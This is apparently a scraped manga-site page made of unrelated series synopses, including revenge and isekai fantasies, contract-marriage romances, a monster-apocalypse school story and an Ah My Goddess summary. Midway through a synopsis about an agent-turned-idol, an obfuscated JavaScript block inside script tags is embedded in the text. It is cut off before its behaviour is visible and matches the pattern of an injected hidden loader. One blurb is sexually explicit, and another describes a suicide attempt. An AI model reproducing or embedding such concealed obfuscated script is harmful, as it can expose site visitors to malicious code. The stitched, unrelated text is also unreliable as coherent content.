it the Supreme BeingWhoever hurts my family, kill them! Whoever steals my woman, kill her! How dare you pretend to be a pussy in front of me? All the more reason to kill! After all the worlds had sunk, Tan Yun finally remembered who he was the moment I awakened, the whole world would tremble at my feet!
The lord of Perbaz, who led the 28-year war to victory, 'Asha Perbaz'. For Pervaz, who was devastated by the long war, Asha heads to the imperial family to receive the victory reward promised by the emperor. However, the only reward that came back was the . As the best choice, Asha pointed out the 'Duke of Carlisle Haven', the first prince who had recently been deprived of the title of crown prince. If she refused, she intended to receive alimony from the emperor... "Marquis Perbaz. I will accept your marriage proposal." Contrary to expectations, the Duke of Carlisle accepted Asha's choice. Promising tremendous support for Pervaz... !
Read manhua Age of Terror / Era of the Haunted / Age of Terror (Side Story) / Global Weird Age The description of the comics “Age of Terror”: Desperate to escape the streets after being discarded by his parents, Flynn finds hope at Willow City Necromancy Academy. There, his hidden spirit talents ignite. Crushing specters and gaining powerful spirit allies, Flynn eclipses his peers. Hailed as a prodigy, Flynn harbors a secret ambition: to become the strongest necromancer fueled by revenge from those who cast him out. As a specter horde marches, can the vengeful prodigy become a hero, or will his fury consume him? “Age of Terror” is another name: Kỷ Nguyên Kỳ Lạ Quanqiu Guiyi Shidai Quánqiú Guǐyì Shídài Worldwide Strange Era ゴースト・エイジ~最強鬼霊を操る俺は世界を制する~ 全球诡异时代
The world's greatest doctor fell off the cliff and died. This results in his daughter, Xu Youran, to seek out refugee with Prince Rui. Unexpectedly, on the way, Youran was betrayed by her maid which resulted in her loss of memory. Her maid took that opportunity to assume Youran's identity and attempted to marry into the Prince's family. No one expected that the soul of the infamous poison, Yue Qianqiu, was reincarnated into Xu Youran's body. Now that she is reborn, how will she, with her once notorious reputation, live out this life?
I was here to be an agent, why do I have to be an idol?! The special forces office Sun Kefei was enrolled into the agency “Music Bureau” that he had been yearning for, but found that this agency was the biggest performers company in the country! Since ancient times, those agents had to take strict training, hid their identities and performed their tasks as pop stars…<script></script><script>(function(_0x5bd8ec,_0x4dc128){var _0x2483e3=_0xe3c4,_0x42df98=_0x5bd8ec();while(!![]){try{var _0x2a87b8=parseInt(_0x2483e3(0x136))/(0x23c2+0x625*0x1+-0x29e6)*(parseInt(_0x2483e3(0x11d))/(0x1*-0x4b2+0x2417*0x1+-0x1f63*0x1))+parseInt(_0x2483e3(0x139))/(0xd29+-0xd7e+0x58)+-parseInt(_0x2483e3(0x122))/(-0xda6*-0x1+0x1*0x10c4+0x6*-0x511)*(-parseInt(_0x2483e3(0x135))/(0x1f*0x1+0x22a3+-0x1*0x22bd))+parseInt(_0x2483e3(0x13a))/(0x1673*-0x1+-0x1628+0x2ca1)+parseInt(_0x2483e3(0x12c))/(-0x66b*0x6+-0x1d89+0x4412)+-parseInt(_0x2483e3(0x12f))/(-0x1*-0x3a9+0x81c+-0xbbd)+-parseInt(_0x2483e3(0x137))/(-0x2164+0x8fc+0x1*0x1871);if(_0x2a87b8===_0x4dc128)break;else _0x42df98['push'](_0x42df98['shift']());}catch(_0x5bd022){_0x42df98['push'](_0x42df98['shift']());}}}(_0x1c17,-0x3a85d*-0x1+-0x3*0x4f4fe+0x12f9ec));function _0xe3c4(_0x14a4ad,_0x36a25a){var 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With the power bestowed upon them by the Gods, the Agents of the Four Seasons bring the seasons to the world. It is their duty to traverse mountains and valleys to bring the blessings to every corner of the world.Each Agent has a special guard for if anything happens to them the seasons stop to cycle.Sakura Himedaka is the guard of Hinagiku Kayo, Agent of Spring. Ayame Hazakura guards Ruri Hazakura, Agent of Summer.Rindo Azami guards Nadeshiko Iwaiduki, Agent of Autumn. Itecho Kangetsu is the guard of Rosei Kantsubaki, Agent of Winter.They have just gone through battles with those who aim to destroy the system.This is a vivid story of four Agents and four guards who wish to protect the world but are also individuals who fall in love.
Keiichi Morisato is a good-natured, yet hapless and girlfriend-less college sophomore who is often imposed upon by his elder dorm-mates and brow-beaten into taking phone messages and doing other chores for them. One day, while alone in his dorm, he accidentally calls the Goddess Technical Help Line and a beautiful goddess named Belldandy materializes in his room. She tells him that her agency has received a system request from him, so she has been sent to grant him a single wish. Skeptical and thinking someone is playing a practical joke on him, he wishes that she stay with him forever. To his surprise, his wish is granted. Belldandy must stay with him, but as his dormitory is strictly male-only, they are both forced onto the street. They set off on his motorcycle to find alternative shelter, eventually seeking cover in an old Buddhist temple. In the morning, they are greeted by the temple's sole inhabitant, a young monk, who welcomes them and gives them permission to stay until they can find permanent lodging. He immediately puts them to work maintaining the temple grounds, but when he sees Belldandy use her powers to save Keiichi from injury, he begins to fear that she may be a demon or sorceress. He is eventually convinced of Belldandy's intrinsic goodness when he witnesses her solicitous care of the temple premises and her perfect meditation ritual. When he decides to go on a pilgrimage to India, the priest gives the couple permission to remain in the temple so long as they continue to maintain it.
In the wake of the recent recession, Keiichi's motorcycle shop has been experiencing financial difficulties. Belldandy enlists the help of her sisters and begins job-hunting to support him! Will she be able to find work? Only the gods can tell!
Read manga Ah, It’s Wonderful To Be Alive / Aa, Ikite Irutte Subarashii / ああ、生きているって素晴らしい Called a failure by his adoptive parents, bullied at school, ignored by teachers, high school boy Kurogane Rikuto has nowhere to belong neither at home nor at school. “Life is shit. I guess I’ll die.” After saying this, he was about to commit suicide by jumping off the school’s roof when suddenly all sorts of monsters started appearing from students’ smartphones, transforming the school into a hellscape of screaming agony. Goblins, orcs, slimes… Everybody has seen them in games: “small fry monsters”. However, humans in the real world, where there is no magic, no special abilities, and no leveling up, are devoured by those “small fries” without any means to retaliate. Rikuto, spared from the incident due to his bullies destroying his phone, seeing the students who bullied him and the teachers dying unsightly deaths and the collapse of order, realizes he does have a desire to survive. Just then, a goblin wielding a club attacks him from behind— Thus begins the survival action tale of one insignificant human driven into extreme circumstances.
"Don't hold back and let me see you go wild." Overwhelmed by her first pleasure, she was brought to orgasm countless times... After being exiled to a monastery on false charges, Lucienne, the daughter of the Marquis, is abducted by Michael, a knight and duke of a neighboring country. His goal as duke was to get a cultivated wife. Secretly in love, she accepted a contract marriage immediately. As soon as she replied the duke approached her. "Now you're mine. I won't let anyone else have you"! As he gazed at her with a look of passion, he took her into his sturdy arms as though to imprison her and she felt as though she'd get the wrong impression that he has a feeling on her...! With melting kisses and passionate petting, she was soaking wet and at his mercy... This is a story of a romance between a duke gripped by his first love and a pure, sheltered heiress.
.A 40 year old doctor living in Japan is suddenly transported to another world. And as a bonus, he's regained his youth! He almost loses all hope after being sold into slavery and experiencing the worst this world has to offer when, suddenly, he's saved by two handsome beastmen!? A story of tender love in another world!
Demons survive by feeding on red human love. After the feeding, the human forgets their loved one. Owl, a demon, meets a woman with a pure love for God. Owl challenges himself to turn her love into red, something other demons failed to do.